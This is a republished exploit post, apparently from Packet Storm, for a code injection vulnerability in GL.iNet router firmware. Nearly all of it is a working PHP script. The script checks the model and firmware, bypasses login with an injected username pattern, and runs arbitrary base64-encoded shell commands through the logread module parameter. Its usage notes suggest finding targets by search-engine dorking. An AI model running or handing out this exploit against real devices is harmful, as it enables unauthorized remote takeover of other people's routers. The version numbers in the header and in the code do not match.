GL.iNet 4.4.3 Code Injection
2024-10-11 22:55:22 Author: packetstormsecurity.com(查看原文) 阅读量:2 收藏

=============================================================================================================================================
| # Title : GL.iNet network 4.4.3 Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |
| # Vendor : https://www.gl-inet.com/ |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] uses the CURL to Allow remote command .

[+] Line 158 set your target .

[+] save code as poc.php .

[+] USage : cmd => c:\www\test\php poc.php

[+] PayLoad :

<?php

class GlinetExploit
{
private $targetUri;
private $sid;
private $glinet;

public function __construct($targetUri)
{
$this->targetUri = $targetUri;
$this->glinet = [
'model' => null,
'firmware' => null,
'arch' => null
];
}

private function send_request($method, $uri, $data = null, $headers = [])
{
$ch = curl_init();

$options = [
CURLOPT_URL => $this->targetUri . $uri,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_CUSTOMREQUEST => $method
];

if ($data) {
$options[CURLOPT_POSTFIELDS] = $data;
$headers[] = 'Content-Type: application/json';
}

curl_setopt_array($ch, $options);
$response = curl_exec($ch);
curl_close($ch);

return $response ? json_decode($response, true) : null;
}

public function check_vuln_version()
{
$postData = json_encode([
'jsonrpc' => '2.0',
'id' => rand(1000, 9999),
'method' => 'call',
'params' => ['', 'ui', 'check_initialized', []]
]);

$res = $this->send_request('POST', '/rpc', $postData);
if ($res && isset($res['result'])) {
$this->glinet['model'] = $res['result']['model'];
$this->glinet['firmware'] = $res['result']['firmware_version'];
}

// Check for vulnerable models and firmware
switch ($this->glinet['model']) {
case 'sft1200':
$this->glinet['arch'] = 'mipsle';
return version_compare($this->glinet['firmware'], '4.3.6', '==');
case 'ar750':
case 'ar750s':
$this->glinet['arch'] = 'mipsbe';
return version_compare($this->glinet['firmware'], '4.3.7', '==');
// Add more cases as per your requirement
}

return false;
}

public function auth_bypass()
{
if (!empty($this->sid)) {
return $this->sid;
}

$postData = json_encode([
'jsonrpc' => '2.0',
'id' => rand(1000, 9999),
'method' => 'challenge',
'params' => ['username' => 'root']
]);

$res = $this->send_request('POST', '/rpc', $postData);

if ($res && isset($res['result']['nonce'])) {
$nonce = $res['result']['nonce'];

$username = "roo[^'union selecT char(114,111,111,116)--]:[^:]+:[^:]+";
$pw = '0';
$hash = md5("$username:$pw:$nonce");

$postData = json_encode([
'jsonrpc' => '2.0',
'id' => rand(1000, 9999),
'method' => 'login',
'params' => [
'username' => $username,
'hash' => $hash
]
]);

$res = $this->send_request('POST', '/rpc', $postData);

if ($res && isset($res['result']['sid'])) {
$this->sid = $res['result']['sid'];
return $this->sid;
}
}

return null;
}

public function execute_command($cmd)
{
$payload = base64_encode($cmd);
$cmd = "echo {$payload}|openssl enc -base64 -d -A|sh";

$postData = json_encode([
'jsonrpc' => '2.0',
'id' => rand(1000, 9999),
'method' => 'call',
'params' => [
$this->sid,
'logread',
'get_system_log',
['lines' => '', 'module' => "|{$cmd}"]
]
]);

return $this->send_request('POST', '/rpc', $postData, ['Admin-Token: ' . $this->sid]);
}

public function check()
{
if ($this->check_vuln_version()) {
return "Vulnerable: {$this->glinet['model']} | {$this->glinet['firmware']} | {$this->glinet['arch']}";
}

return 'Not Vulnerable';
}

public function exploit($command)
{
$this->sid = $this->auth_bypass();

if ($this->sid) {
echo "SID: {$this->sid}\n";
echo "Executing: {$command}\n";
$this->execute_command($command);
} else {
echo "Authentication bypass failed.\n";
}
}
}

// Usage
$exploit = new GlinetExploit('https://target-url');
$exploit->exploit('ls');

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================


文章来源: https://packetstormsecurity.com/files/182150/glinet443-exec.txt
如有侵权请联系:admin#unsafe.sh